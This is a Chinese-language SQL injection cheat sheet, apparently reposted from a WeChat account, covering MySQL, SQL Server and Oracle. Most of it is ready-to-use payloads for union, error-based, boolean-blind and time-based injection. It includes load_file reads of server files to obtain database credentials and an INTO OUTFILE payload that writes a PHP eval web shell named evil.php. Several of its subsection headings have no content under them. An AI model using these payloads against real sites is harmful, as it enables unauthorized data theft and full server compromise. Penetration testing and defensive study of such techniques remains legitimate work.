架构设计
4327
SQL 注入分类方式:
提交方式:GET POST COOKIE
0x01 Mysql
Mysql划分:权限 root 普通用户 版本 mysql>5.0 mysql<5.0
1.1 root权限
load_file和into outfile用户必须有FILE权限,并且还需要知道网站的绝对路径
判断是否具有读写权限
and (select count(*) from mysql.user)>0#
A、Load_file() 该函数用来读取源文件的函数,只能读取绝对路径的网页文件
注意:路径符号”\”错误 “\”正确 “/”正确,转换成十六进制,不用“”
id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(’/var/www/index.php’)(物理路径转16进制)
可以用来读取数据库连接文件获取数据连接账号、密码等
?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23
B、into outfile函数
条件:1. 绝对路径 2.可以使用单引号
?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'
1.2 MySQL联合查询
1.2.1 适用于mysql低于5.0版本
1.判断是否可以注入
1.2.2 适用于Mysql 5.0以上版本支持查表查列
1.先判断是否可以注入
1.3 MySQL报错注入
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。
多种报错注入方式:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1.4 MySQL盲注
基于布尔型注入
id=1 and (select length(user()))=20 # 返回正常页面 长度20位
基于时间型注入
1 xor (if(ascii(mid(user()from(1)for(1)))='r',sleep(5),0))
0x02 SQLServer
SA权限:数据库操作,文件管理,命令执行,注册表读取等
Db权限:文件管理,数据库操作等
Public权限:数据库操作
2.1 SQLServer 联合查询
1.判断是否存在注入
2.2 SQLServer 报错注入
1.获取表名
2.3 SQLServer 盲注
1、猜表名
0x03 Oracle
3.1 联合查询
Union select null,null,null 从第一个null开始加’null’,得到显示位
3.2 手工显错注入
最大的区别就是utl_inaddr.get_host_address这个函数,10g可以调用,11g需要dba高权限
3.3 盲注
基于布尔类型的盲注:
?id=7782' and length((SELECT name FROM v$database))=4-- 获取数据库名长度
基于时间延迟的盲注:
?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)--
本文分享自微信公众号 - Bypass(Bypass--)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
广告
